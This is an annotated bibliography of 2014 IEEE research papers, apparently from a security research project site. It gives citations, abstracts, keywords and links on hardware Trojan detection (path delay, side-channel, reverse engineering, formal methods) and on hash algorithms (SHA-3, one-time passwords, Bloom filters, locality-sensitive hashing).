Hardware Trojan Horse Detection


Detection and neutralization of hardware-embedded Trojans is a difficult problem. Current research is attempting to find ways to develop detection methods and processes and to automate the process. The research presented here addresses path delay, slack removal, reverse engineering, and counterfeit prevention. These papers were presented and published in the first half of 2014.

  • Kitsos, Paris; Voyiatzis, Artemios G., "Towards a Hardware Trojan Detection Methodology," Embedded Computing (MECO), 2014 3rd Mediterranean Conference on , vol., no., pp.18,23, 15-19 June 2014. ( Malicious hardware is a realistic threat. It can be possible to insert the malicious functionality on a device as deep as in the hardware design flow, long before manufacturing the silicon product. Towards developing a hardware Trojan horse detection methodology, we analyze capabilities and limitations of existing techniques, framing a testing strategy for uncovering efficiently hardware Trojan horses in mass-produced integrated circuits.
    Keywords: Delays; Hardware ;Integrated circuit modeling; Power demand; Trojan horses; Vectors; detection techniques; integrated circuits; security hardware Trojans horses; trusted hardware ID#:14-2102)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6862687&isnumber=6862649
  • Kumar, P.; Srinivasan, R., "Detection of Hardware Trojan In SEA Using Path Delay," Electrical, Electronics and Computer Science (SCEECS), 2014 IEEE Students' Conference on , vol., no., pp.1,6, 1-2 March 2014. (ID#:14-2103)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6804444&isnumber=6804412 Detecting hardware Trojan is a difficult task in general. The context is that of a fabless design house that sells IP blocks as GDSII hard macros, and wants to check that final products have not been infected by Trojan during the foundry stage. In this paper we analyzed hardware Trojan horses insertion and detection in Scalable Encryption Algorithm (SEA) crypto. We inserted Trojan at different levels in the ASIC design flow of SEA crypto and most importantly we focused on Gate level and layout level Trojan insertions. We choose path delays in order to detect Trojan at both levels in design phase. Because the path delays detection technique is cost effective and efficient method to detect Trojan. The comparison of path delays makes small Trojan circuits significant from a delay point of view. We used typical, fast and slow 90nm libraries in order to estimate the efficiency of path delay technique in different operating conditions. The experiment's results show that the detection rate on payload Trojan is 100%.
    Keywords: application specific integrated circuits; cryptography; delays; invasive software; logic circuits; ASIC design flow; GDSII hard macros; IP blocks; SEA crypto; Trojan circuits; fabless design house; gate level Trojan insertions; hardware Trojan detection; hardware Trojan horses insertion; layout level Trojan insertions; path delay; payload Trojan detection rate; scalable encryption algorithm crypto; Algorithm design and analysis; Delays ;Encryption; Hardware; Logic gates; Trojan horses; GDSII; HTH detection and insertion; Hardware Trojan horses (HTH);Scalable Encryption Algorithm (SEA);path delay; payload Trojan (ID#:14-2103)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6804444&isnumber=6804412
  • Yoshimizu, Norimasa, "Hardware Trojan Detection By Symmetry Breaking In Path Delays," Hardware-Oriented Security and Trust (HOST), 2014 IEEE International Symposium on , vol., no., pp.107,111, 6-7 May 2014. This paper discusses the detection of hardware Trojans (HTs) by their breaking of symmetries within integrated circuits (ICs), as measured by path delays. Typically, path delay or side channel methods rely on comparisons to a golden, or trusted, sample. However, golden standards are affected by inter-and intra-die variations which limit the confidence in such comparisons. Symmetry is a way to detect modifications to an IC with increased confidence by confirming subcircuit consistencies within as it was originally designed. The difference in delays from a given path to a set of symmetric paths will be the same unless an inserted HT breaks symmetry. Symmetry can naturally exist in ICs or be artificially added. We describe methods to find and measure path delays against symmetric paths, as well as the advantages and disadvantages of this method. We discuss results of examples from benchmark circuits demonstrating the detection of hardware Trojans.
    Keywords: Delays; Hardware; Integrated circuits; Logic gates; Sensitivity; Transistors; Trojan horses; circuit symmetries; hardware Trojan; integrated circuits; path delay (ID#:14-2104)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6855579&isnumber=6855557
  • Ramdas, Abishek; Saeed, Samah Mohamed; Sinanoglu, Ozgur, "Slack Removal For Enhanced Reliability And Trust," Design & Technology of Integrated Systems In Nanoscale Era (DTIS), 2014 9th IEEE International Conference On , vol., no., pp.1,4, 6-8 May 2014. Timing slacks possibly lead to reliability issues and/or security vulnerabilities, as they may hide small delay defects and malicious circuitries injected during fabrication, namely, hardware Trojans. While possibly harmless immediately after production, small delay defects may trigger reliability problems as the part is being used in field, presenting a significant threat for mission-critical applications. Hardware Trojans remain dormant while the part is tested and validated, but then get activated to launch an attack when the chip is deployed in security-critical applications. In this paper, we take a deeper look into these problems and their underlying reasons, and propose a design technique to maximize the detection of small delay defects as well as the hardware Trojans. The proposed technique eliminates all slacks by judiciously inserting delay units in a small set of locations in the circuit, thereby rendering a simple set of transition fault patterns quite effective in catching parts with small delay defects or Trojans. Experimental results also justify the efficacy of the proposed technique in improving the quality of test while retaining the pattern count and care bit density intact.
    Keywords: Circuit faults; Delays; Hardware; Logic gates; Testing; Trojan horses; Wires; At-speed Testing; Hardware Trojan; Slacks; Small Delay Defects (ID#:14-2105)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6850660&isnumber=6850634
  • Chongxi Bao; Forte, D.; Srivastava, A, "On Application Of One-Class SVM To Reverse Engineering-Based Hardware Trojan Detection," Quality Electronic Design (ISQED), 2014 15th International Symposium on , vol., no., pp.47,54, 3-5 March 2014. Due to design and fabrication outsourcing to foundries, the problem of malicious modifications to integrated circuits known as hardware Trojans has attracted attention in academia as well as industry. To reduce the risks associated with Trojans, researchers have proposed different approaches to detect them. Among these approaches, test-time detection approaches have drawn the greatest attention and most approaches assume the existence of a "golden model". Prior works suggest using reverse-engineering to identify such Trojan-free ICs for the golden model but they did not state how to do this efficiently. In this paper, we propose an innovative and robust reverse engineering approach to identify the Trojan-free ICs. We adapt a well-studied machine learning method, one-class support vector machine, to solve our problem. Simulation results using state-of-the-art tools on several publicly available circuits show that our approach can detect hardware Trojans with high accuracy rate across different modeling and algorithm parameters.
    Keywords: electronic engineering computing; integrated circuit design; invasive software; learning (artificial intelligence);reverse engineering; support vector machines; Trojan-free IC identification; fabrication outsourcing; golden model; integrated circuits; one-class SVM; one-class support vector machine; reverse engineering-based hardware Trojan detection; test-time detection approach; well-studied machine learning method; Feature extraction; Integrated circuit modeling; ayout; Support vector machines; Training; Trojan horses (ID#:14-2106)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6783305&isnumber=6783285
  • Tehranipoor, M.; Forte, D., "Tutorial T4: All You Need to Know about Hardware Trojans and Counterfeit ICs," VLSI Design and 2014 13th International Conference on Embedded Systems, 2014 27th International Conference on , vol., no., pp.9,10, 5-9 Jan. 2014. The migration from a vertical to horizontal business model has made it easier to introduce hardware Trojans and counterfeit electronic parts into the electronic component supply chain. Hardware Trojans are malicious modifications made to original IC designs that reduce system integrity (change functionality, leak private data, etc.). Counterfeit parts are often below specification and/or of substandard quality. The existence of Trojans and counterfeit parts creates risks for the life-critical systems and infrastructures that incorporate them including automotive, aerospace, military, and medical systems. In this tutorial, we will cover: (i) Background and motivation for hardware Trojan and counterfeit prevention/detection; (ii) Taxonomies related to both topics; (iii) Existing solutions; (iv) Open challenges; (v) New and unified solutions to address these challenges.
    Keywords: {hardware-software codesign; integrated circuit testing; invasive software; counterfeit IC; counterfeit detection; counterfeit electronic parts; counterfeit prevention; electronic component supply chain; hardware Trojans; horizontal business model; life-critical systems; original IC designs; system integrity; vertical business model; Awards activities; Conferences ;Educational institutions; Hardware; Trojan horses; Tutorials; Very large scale integration (ID#:14-2107)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6733093&isnumber=6733066
  • Soll, Oliver; Korak, Thomas; Muehlberghuber, Michael; Hutter, Michael, "EM-based Detection Of Hardware Trojans On FPGAs," Hardware-Oriented Security and Trust (HOST), 2014 IEEE International Symposium on , vol., no., pp.84,87, 6-7 May 2014. The detectability of malicious circuitry on FPGAs with varying placement properties yet has to be investigated. The authors utilize a Xilinx Virtex-II Pro target platform in order to insert a sequential denial-of-service Trojan into an existing AES design by manipulating a Xilinx-specific, intermediate file format prior to the bitstream generation. Thereby, there is no need for an attacker to acquire access to the hardware description language representation of a potential target architecture. Using a side-channel analysis setup for electromagnetic emanation (EM) measurements, they evaluate the detectability of different Trojan designs with varying location and logic distribution properties. The authors successfully distinguish the malicious from the genuine designs and provide information on how the location and distribution properties of the Trojan logic affect its detectability. To the best of their knowledge, this has been the first practically conducted Trojan detection using localized EM measurements.
    Keywords: Clocks; Field programmable gate arrays; Hardware; Layout; Probes; Software; Trojan horses; Hardware Trojan injection; RapidSmith; Trojan placement; electromagnetic emanation; side-channel analysis (ID#:14-2108)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6855574&isnumber=6855557
  • Yier Jin; Sullivan, D., "Real-time Trust Evaluation In Integrated Circuits," Design, Automation and Test in Europe Conference and Exhibition (DATE), 2014 , vol., no., pp.1,6, 24-28 March 2014. The use of side-channel measurements and fingerprinting, in conjunction with statistical analysis, has proven to be the most effective method for accurately detecting hardware Trojans in fabricated integrated circuits. However, these post-fabrication trust evaluation methods overlook the capabilities of advanced design skills that attackers can use in designing sophisticated Trojans. To this end, we have designed a Trojan using power-gating techniques and demonstrate that it can be masked from advanced side-channel fingerprinting detection while dormant. We then propose a real-time trust evaluation framework that continuously monitors the on-board global power consumption to monitor chip trustworthiness. The measurements obtained corroborate our frameworks effectiveness for detecting Trojans. Finally, the results presented are experimentally verified by performing measurements on fabricated Trojan-free and Trojan-infected variants of a reconfigurable linear feedback shift register (LFSR) array.
    Keywords: integrated circuits; invasive software; shift registers; statistical analysis; LFSR array; Trojan-free variants; Trojan-infected variants; advanced design skills; chip trustworthiness; hardware Trojan detection; integrated circuits; on-board global power consumption; post-fabrication trust evaluation methods; power-gating techniques; real-time trust evaluation framework; reconfigurable linear feedback shift register array; side-channel fingerprinting detection; side-channel measurements; Erbium; Hardware; Power demand; Power measurement; Semiconductor device measurement; Testing; Trojan horses (ID#:14-2109)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6800305&isnumber=6800201
  • Bhunia, S.; Hsiao, M.S.; Banga, M.; Narasimhan, S., "Hardware Trojan Attacks: Threat Analysis and Countermeasures," Proceedings of the IEEE , vol.102, no.8, pp.1229,1247, Aug. 2014 Security of a computer system has been traditionally related to the security of the software or the information being processed. The underlying hardware used for information processing has been considered trusted. The emergence of hardware Trojan attacks violates this root of trust. These attacks, in the form of malicious modifications of electronic hardware at different stages of its life cycle, pose major security concerns in the electronics industry. An adversary can mount such an attack with an objective to cause operational failure or to leak secret information from inside a chip--e.g., the key in a cryptographic chip, during field operation. Global economic trend that encourages increased reliance on untrusted entities in the hardware design and fabrication process is rapidly enhancing the vulnerability to such attacks. In this paper, we analyze the threat of hardware Trojan attacks; present attack models, types, and scenarios; discuss different forms of protection approaches, both proactive and reactive; and describe emerging attack modes, defenses, and future research pathways.
    Keywords: Circuit faults; Computer security; Fabrication; Hardware; Integrated circuit modeling; Integrated circuits; Trojan horses; Hardware intellectual property (IP) trust; Trojan detection; Trojan taxonomy; Trojan tolerance; hardware Trojan attacks; hardware obfuscation; self-referencing; side-channel analysis (ID#:14-2110)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6856140&isnumber=6860340
  • Rathmair, Michael; Schupfer, Florian; Krieg, Christian, "Applied Formal Methods For Hardware Trojan Detection," Circuits and Systems (ISCAS), 2014 IEEE International Symposium on , vol., no., pp.169,172, 1-5 June 2014. This paper addresses the potential danger using integrated circuits which contain malicious hardware modifications hidden in the silicon structure. A so called hardware Trojan may be added at several stages of the chip development process. This work concentrates on formal hardware Trojan detection during the design phase and highlights applied verification techniques. Selected methods are discussed and their combination used to increase an introduced "Trojan Assurance Level".
    Keywords: Data structures; Equations; Hardware; Mathematical model; Model checking; Trojan horses; Vectors (ID#:14-2111)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6865092&isnumber=6865048
  • Subramanyan, P.; Tsiskaridze, N.; Wenchao Li; Gascon, A; Wei Yang Tan; Tiwari, A; Shankar, N.; Seshia, S.A; Malik, S., "Reverse Engineering Digital Circuits Using Structural and Functional Analyses," Emerging Topics in Computing, IEEE Transactions on , vol.2, no.1, pp.63,80, March 2014. Integrated circuits (ICs) are now designed and fabricated in a globalized multivendor environment making them vulnerable to malicious design changes, the insertion of hardware Trojans/malware, and intellectual property (IP) theft. Algorithmic reverse engineering of digital circuits can mitigate these concerns by enabling analysts to detect malicious hardware, verify the integrity of ICs, and detect IP violations. In this paper, we present a set of algorithms for the reverse engineering of digital circuits starting from an unstructured netlist and resulting in a high-level netlist with components such as register files, counters, adders, and subtractors. Our techniques require no manual intervention and experiments show that they determine the functionality of >45% and up to 93% of the gates in each of the test circuits that we examine. We also demonstrate that our algorithms are scalable to real designs by experimenting with a very large, highly-optimized system-on-chip (SOC) design with over 375000 combinational elements. Our inference algorithms cover 68% of the gates in this SOC. We also demonstrate that our algorithms are effective in aiding a human analyst to detect hardware Trojans in an unstructured netlist.
    Keywords: industrial property; integrated circuit design; invasive software; reverse engineering; system-on-chip ;ICs; IP theft; IP violation detection; SoC design; adders; algorithmic reverse engineering digital circuits; combinational elements; counters; functional analysis; globalized multivendor environment; hardware trojans-malware; high-level netlist; integrated circuits ;intellectual property; register files; structural analysis; subtractors; test circuits; unstructured netlist; very large highly-optimized system-on-chip design; Algorithm design and analysis; Globalization; Hardware; Inference algorithms; Integrated circuits; Logic gates; Reverse engineering; Trojan horses; Digital circuits; computer security; design automation; formal verification (ID#:14-2112)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6683016&isnumber=6824880

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Hash Algorithms

Hash Algorithms



Hashing algorithms are used extensively in information security and forensics. Research focuses on new methods and techniques to optimize security. The articles cited here, from the first half of 2014, cover topics such as Secure Hash Algorithm (SHA)-1 and SHA-3, one time password generation, Keccac and Mceliece algorithms, and Bloom filters.

  • Eddeen, L.M.H.N.; Saleh, E.M.; Saadah, D., "Genetic Hash Algorithm," Computer Science and Information Technology (CSIT), 2014 6th International Conference on , vol., no., pp.23,26, 26-27 March 2014. Security is becoming a major concern in computing. New techniques are evolving every day; one of these techniques is Hash Visualization. Hash Visualization uses complex random generated images for security, these images can be used to hide data (watermarking). This proposed new technique improves hash visualization by using genetic algorithms. Genetic algorithms are a search optimization technique that is based on the evolution of living creatures. The proposed technique uses genetic algorithms to improve hash visualization. The used genetic algorithm was away faster than traditional previous ones, and it improved hash visualization by evolving the tree that was used to generate the images, in order to obtain a better and larger tree that will generate images with higher security. The security was satisfied by calculating the fitness value for each chromosome based on a specifically designed algorithm.
    Keywords: cryptography; data encapsulation; genetic algorithms; image watermarking; trees (mathematics);complex random generated images; data hiding; genetic hash algorithm; hash visualization; search optimization technique; watermarking; Authentication; Biological cells; Data visualization; Genetic algorithms; Genetics; Visualization; Chromosome; Fitness value; Genetic Algorithms; Hash Visualization; Hash functions; Security (ID#:14-2113)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6805974&isnumber=6805962
  • Kishore, N.; Kapoor, B., "An Efficient Parallel Algorithm For Hash Computation In Security And Forensics Applications," Advance Computing Conference (IACC), 2014 IEEE International , vol., no., pp.873,877, 21-22 Feb. 2014. Hashing algorithms are used extensively in information security and digital forensics applications. This paper presents an efficient parallel algorithm hash computation. It's a modification of the SHA-1 algorithm for faster parallel implementation in applications such as the digital signature and data preservation in digital forensics. The algorithm implements recursive hash to break the chain dependencies of the standard hash function. We discuss the theoretical foundation for the work including the collision probability and the performance implications. The algorithm is implemented using the OpenMP API and experiments performed using machines with multicore processors. The results show a performance gain by more than a factor of 3 when running on the 8-core configuration of the machine.
    Keywords: application program interfaces; cryptography; digital forensics; digital signatures; file organization; parallel algorithms; probability; OpenMP API;SHA-1 algorithm; collision probability; data preservation; digital forensics; digital signature; hash computation; hashing algorithms; information security; parallel algorithm; standard hash function; Algorithm design and analysis; Conferences; Cryptography; Multicore processing; Program processors; Standards; Cryptographic Hash Function; Digital Forensics; Digital Signature; MD5; Multicore Processors; OpenMP;SHA-1 (ID#:14-2114)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6779437&isnumber=6779283
  • Nemoianu, I-D.; Greco, C.; Cagnazzo, M.; Pesquet-Popescu, B., "On a Hashing-Based Enhancement of Source Separation Algorithms over Finite Fields for Network Coding Perspectives," Multimedia, IEEE Transactions on, vol. PP, no.99, pp.1, 1, July 2014. Blind Source Separation (BSS) deals with the recovery of source signals from a set of observed mixtures, when little or no knowledge of the mixing process is available. BSS can find an application in the context of network coding, where relaying linear combinations of packets maximizes the throughput and increases the loss immunity. By relieving the nodes from the need to send the combination coefficients, the overhead cost is largely reduced. However, the scaling ambiguity of the technique and the quasi-uniformity of compressed media sources makes it unfit, at its present state, for multimedia transmission. In order to open new practical applications for BSS in the context of multimedia transmission, we have recently proposed to use a non-linear encoding to increase the discriminating power of the classical entropy-based separation methods. Here, we propose to append to each source a non-linear message digest, which offers an overhead smaller than a per-symbol encoding and that can be more easily tuned. Our results prove that our algorithm is able to provide high decoding rates for different media types such as image, audio, and video, when the transmitted messages are less than 1.5 kilobytes, which is typically the case in a realistic transmission scenario.
    Keywords: (not provided) (ID#:14-2115)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6862888&isnumber=4456689
  • Bayat-Sarmadi, S.; Mozaffari-Kermani, M.; Reyhani-Masoleh, A, "Efficient and Concurrent Reliable Realization of the Secure Cryptographic SHA-3 Algorithm," Computer-Aided Design of Integrated Circuits and Systems, IEEE Transactions on , vol.33, no.7, pp.1105,1109, July 2014. The secure hash algorithm (SHA)-3 has been selected in 2012 and will be used to provide security to any application which requires hashing, pseudo-random number generation, and integrity checking. This algorithm has been selected based on various benchmarks such as security, performance, and complexity. In this paper, in order to provide reliable architectures for this algorithm, an efficient concurrent error detection scheme for the selected SHA-3 algorithm, i.e., Keccak, is proposed. To the best of our knowledge, effective countermeasures for potential reliability issues in the hardware implementations of this algorithm have not been presented to date. In proposing the error detection approach, our aim is to have acceptable complexity and performance overheads while maintaining high error coverage. In this regard, we present a low-complexity recomputing with rotated operands-based scheme which is a step-forward toward reducing the hardware overhead of the proposed error detection approach. Moreover, we perform injection-based fault simulations and show that the error coverage of close to 100% is derived. Furthermore, we have designed the proposed scheme and through ASIC analysis, it is shown that acceptable complexity and performance overheads are reached. By utilizing the proposed high-performance concurrent error detection scheme, more reliable and robust hardware implementations for the newly-standardized SHA-3 are realized.
    Keywords: application specific integrated circuits; computational complexity; concurrency control; cryptography; error detection; parallel processing; ASIC analysis; Keccak;SHA-3 algorithm; acceptable complexity; error coverage; hardware overhead reduction; hashing; high-performance concurrent error detection scheme; injection-based fault simulations; integrity checking ;low-complexity recomputing; performance overheads; pseudorandom number generation; reliability; robust hardware implementations ;rotated operand-based scheme; secure hash algorithm; step-forward toward; Algorithm design and analysis; Application specific integrated circuits; Circuit faults; Cryptography; Hardware; Reliability; Transient analysis; Application-specific integrated circuit (ASIC);high performance; reliability; secure hash algorithm (SHA)-3; security (ID#:14-2116)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6835288&isnumber=6835125
  • Ghosh, Santosh, "On the Implementation Of Mceliece With CCA2 Indeterminacy by SHA-3," Circuits and Systems (ISCAS), 2014 IEEE International Symposium on, vol., no., pp.2804, 2807, 1-5 June 2014. This paper deals with the design and implementation of the post-quantum public-key algorithm McEliece. Seamless incorporation of a new error generator and new SHA-3 module provides higher indeterminacy and more randomization of the original McEliece algorithm and achieves CCA2 security standard. Due to the lightweight and high-speed implementation of SHA-3 module the proposed 128-bit secure McEliece architecture provides 6% higher performance in only 0.78 times area of the best known existing design.
    Keywords: Algorithm design and analysis; Clocks; Computer architecture; Encryption; Vectors; CCA2; Keccak ;McEliece; Post-quantum cryptography; SHA-3; Secure hash algorithm; public-key (ID#:14-2117)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6865756&isnumber=6865048
  • Yakut, S.; Ozer, AB., "HMAC Based One Time Password Generator," Signal Processing and Communications Applications Conference (SIU), 2014 22nd, vol., no., pp.1563,1566, 23-25 April 2014. One Time Password which is fixed length strings to perform authentication in electronic media is used as a one-time. In this paper, One Time Password production methods which based on hash functions were investigated. Keccak digest algorithm was used for the production of One Time Password. This algorithm has been selected as the latest standards for hash algorithm in October 2012 by National Instute of Standards and Technology. This algorithm is preferred because it is faster and safer than the others. One Time Password production methods based on hash functions is called Hashing-Based Message Authentication Code structure. In these structures, the key value is using with the hash function to generate the Hashing-Based Message Authentication Code value. Produced One Time Password value is based on the This value. In this application, the length of the value One Time Password was the eight characters to be useful in practice.
    Keywords: cryptography; message authentication; HMAC; Keccak digest algorithm; electronic media; fixed length strings; hash algorithm; hash functions; hashing-based message authentication code structure; one time password generator; one time password production methods;Authentication;Conferences;Cryptography;Production;Signal processing; Signal processing algorithms; Standards; Hash Function; Hash-Based Message Authentication Code; Keccak; One Time Passwords (ID#:14-2118)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6830541&isnumber=6830164
  • Hyesook Lim; Kyuhee Lim; Nara Lee; Kyong-Hye Park, "On Adding Bloom Filters to Longest Prefix Matching Algorithms," Computers, IEEE Transactions on , vol.63, no.2, pp.411,423, Feb. 2014. High-speed IP address lookup is essential to achieve wire-speed packet forwarding in Internet routers. Ternary content addressable memory (TCAM) technology has been adopted to solve the IP address lookup problem because of its ability to perform fast parallel matching. However, the applicability of TCAMs presents difficulties due to cost and power dissipation issues. Various algorithms and hardware architectures have been proposed to perform the IP address lookup using ordinary memories such as SRAMs or DRAMs without using TCAMs. Among the algorithms, we focus on two efficient algorithms providing high-speed IP address lookup: parallel multiple-hashing (PMH) algorithm and binary search on level algorithm. This paper shows how effectively an on-chip Bloom filter can improve those algorithms. A performance evaluation using actual backbone routing data with 15,000-220,000 prefixes shows that by adding a Bloom filter, the complicated hardware for parallel access is removed without search performance penalty in parallel-multiple hashing algorithm. Search speed has been improved by 30-40 percent by adding a Bloom filter in binary search on level algorithm.
    Keywords: DRAM chips ;Internet; SRAM chips; data structures; routing protocols; Bloom filters; DRAM; IP address lookup; Internet protocol; Internet routers; PMH algorithm; SRAM; TCAM technology; binary search; dynamic random access memory; fast parallel matching; hardware architectures; level algorithm; parallel multiple-hashing algorithm; parallel-multiple hashing algorithm; performance evaluation; prefix matching algorithms; static random access memory; ternary content addressable memory technology; wire-speed packet forwarding; Generators; IP networks; Indexes; Memory management; Routing; System-on-a-chip; Bloom filter; Generators; IP address lookup; IP networks; Indexes; Internet; Memory management; Routing; System-on-a-chip; binary search on levels; leaf pushing; longest prefix matching; multihashing; router (ID#:14-2119)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6263242&isnumber=6701304
  • Jae Min Cho; Kiyoung Choi, "An FPGA Implementation Of High-Throughput Key-Value Store Using Bloom Filter," VLSI Design, Automation and Test (VLSI-DAT), 2014 International Symposium on , vol., no., pp.1,4, 28-30 April 2014. This paper presents an efficient implementation of key-value store using Bloom filters on FPGA. Bloom filters are used to reduce the number of unnecessary accesses to the hash tables, thereby improving the performance. Additionally, for better hash table utilization, we use a modified cuckoo hashing algorithm for the implementation. They are implemented in FPGA to further improve the performance. Experimental results show significant performance improvement over existing approaches.
    Keywords: data structures field programmable gate arrays; file organization; Bloom filter; FPGA implementation; cuckoo hashing algorithm; hash tables; high-throughput key-value store; Arrays; Field programmable gate arrays; Hardware; Information filters; Random access memory; Software; Bloom filter; FPGA; Key-value Store (ID#:14-2120)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6834868&isnumber=6834858
  • Mokhtar, B.; Eltoweissy, M., "Towards a Data Semantics Management System for Internet Traffic," New Technologies, Mobility and Security (NTMS), 2014 6th International Conference on, vol., no., pp.1, 5, March 30 2014-April 2, 2014. Although current Internet operations generate voluminous data, they remain largely oblivious of traffic data semantics. This poses many inefficiencies and challenges due to emergent or anomalous behavior impacting the vast array of Internet elements such as services and protocols. In this paper, we propose a Data Semantics Management System (DSMS) for learning Internet traffic data semantics to enable smarter semantics- driven networking operations. We extract networking semantics and build and utilize a dynamic ontology of network concepts to better recognize and act upon emergent or abnormal behavior. Our DSMS utilizes: (1) Latent Dirichlet Allocation algorithm (LDA) for latent features extraction and semantics reasoning; (2) big tables as a cloud-like data storage technique to maintain large-scale data; and (3) Locality Sensitive Hashing algorithm (LSH) for reducing data dimensionality. Our preliminary evaluation using real Internet traffic shows the efficacy of DSMS for learning behavior of normal and abnormal traffic data and for accurately detecting anomalies at low cost.
    Keywords: Internet; data reduction;l earning (artificial intelligence);ontologies (artificial intelligence);storage management; telecommunication traffic; DSMS; Internet traffic data semantic learning; LSH; cloud-like data storage technique; data dimensionality reduction; data semantics management system; dynamic ontology; latent Dirichlet allocation algorithm; learning behavior ;locality sensitive hashing algorithm; networking semantics; protocols; traffic data semantics; Algorithm design and analysis; Cognition; Data mining; Data models; Feature extraction; Internet; Semantics (ID#:14-2121)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6814054&isnumber=6813963
  • Kafai, M.; Eshghi, K.; Bhanu, B., "Discrete Cosine Transform Locality-Sensitive Hashes for Face Retrieval," Multimedia, IEEE Transactions on , vol.16, no.4, pp.1090,1103, June 2014. Descriptors such as local binary patterns perform well for face recognition. Searching large databases using such descriptors has been problematic due to the cost of the linear search, and the inadequate performance of existing indexing methods. We present Discrete Cosine Transform (DCT) hashing for creating index structures for face descriptors. Hashes play the role of
    Keywords: an index is created, and queried to find the images most similar to the query image. Common hash suppression is used to improve retrieval efficiency and accuracy. Results are shown on a combination of six publicly available face databases (LFW, FERET, FEI, BioID, Multi-PIE, and RaFD). It is shown that DCT hashing has significantly better retrieval accuracy and it is more efficient compared to other popular state-of-the-art hash algorithms.
    Keywords: cryptography; discrete cosine transforms; face recognition; image coding; image retrieval; BioID; DCT hashing; FEI; FERET; LFW; RaFD; discrete cosine transform hashing; face databases; face descriptors; face recognition; face retrieval; hash suppression ;image querying; index structures; linear search; local binary patterns; locality-sensitive hashes; multiPIE; retrieval efficiency; Discrete cosine transforms; Face ;Indexing; Kernel; Probes; Vectors; Discrete Cosine Transform (DCT) hashing; Local Binary Patterns (LBP);Locality-Sensitive Hashing (LSH);face indexing; image retrieval (ID#:14-2122)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6737233&isnumber=6814813
  • Jingkuan Song; Yi Yang; Xuelong Li; Zi Huang; Yang Yang, "Robust Hashing With Local Models for Approximate Similarity Search," Cybernetics, IEEE Transactions on , vol.44, no.7, pp.1225,1236, July 2014. Similarity search plays an important role in many applications involving high-dimensional data. Due to the known dimensionality curse, the performance of most existing indexing structures degrades quickly as the feature dimensionality increases. Hashing methods, such as locality sensitive hashing (LSH) and its variants, have been widely used to achieve fast approximate similarity search by trading search quality for efficiency. However, most existing hashing methods make use of randomized algorithms to generate hash codes without considering the specific structural information in the data. In this paper, we propose a novel hashing method, namely, robust hashing with local models (RHLM), which learns a set of robust hash functions to map the high-dimensional data points into binary hash codes by effectively utilizing local structural information. In RHLM, for each individual data point in the training dataset, a local hashing model is learned and used to predict the hash codes of its neighboring data points. The local models from all the data points are globally aligned so that an optimal hash code can be assigned to each data point. After obtaining the hash codes of all the training data points, we design a robust method by employing l2,1-norm minimization on the loss function to learn effective hash functions, which are then used to map each database point into its hash code. Given a query data point, the search process first maps it into the query hash code by the hash functions and then explores the buckets, which have similar hash codes to the query hash code. Extensive experimental results conducted on real-life datasets show that the proposed RHLM outperforms the state-of-the-art methods in terms of search quality and efficiency.
    Keywords: computational complexity; file organization; query processing; RHLM; approximate similarity search; binary hash codes; database point; dimensionality curse; feature dimensionality; high-dimensional data; high-dimensional data point mapping;l2,1-norm minimization; local hashing model; local structural information; loss function; optimal hash code; query data point; query hash code real-life datasets; robust hash function learning; robust hashing-with-local models; search efficiency; search quality; training data points; training dataset; Databases; Laplace equations; Linear programming; Nickel; Robustness; Training; Training data; Approximate similarity search; indexing; robust hashing}, (ID#:14-2123)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6714849&isnumber=6832663
  • Balkesen, C.; Teubner, J.; Alonso, G.; Ozsu, M., "Main-Memory Hash Joins on Modern Processor Architectures," Knowledge and Data Engineering, IEEE Transactions on, vol. PP, no.99, pp.1, 1, March 2014. Existing main-memory hash join algorithms for multi-core can be classified into two camps. Hardware-oblivious hash join variants do not depend on hardware-specific parameters. Rather, they consider qualitative characteristics of modern hardware and are expected to achieve good performance on any technologically similar platform. The assumption behind these algorithms is that hardware is now good enough at hiding its own limitations--through automatic hardware prefetching, out-of-order execution, or simultaneous multi-threading (SMT)--to make hardware-oblivious algorithms competitive without the overhead of carefully tuning to the underlying hardware. Hardware-conscious implementations, such as (parallel) radix join, aim to maximally exploit a given architecture by tuning the algorithm parameters (e.g., hash table sizes) to the particular features of the architecture. The assumption here is that explicit parameter tuning yields enough performance advantages to warrant the effort required. This paper compares the two approaches under a wide range of workloads (relative table sizes, tuple sizes, effects of sorted data, etc.) and configuration parameters (VM page sizes, number of threads, number of cores, SMT, SIMD, prefetching, etc.). The results show that hardware-conscious algorithms generally outperform hardware-oblivious ones. However, on specific workloads and special architectures with aggressive simultaneous multi-threading, hardware-oblivious algorithms are competitive. The main conclusion of the paper is that, in existing multi-core architectures, it is still important to carefully tailor algorithms to the underlying hardware to get the necessary performance. But processor developments may require to revisit this conclusion in the future.
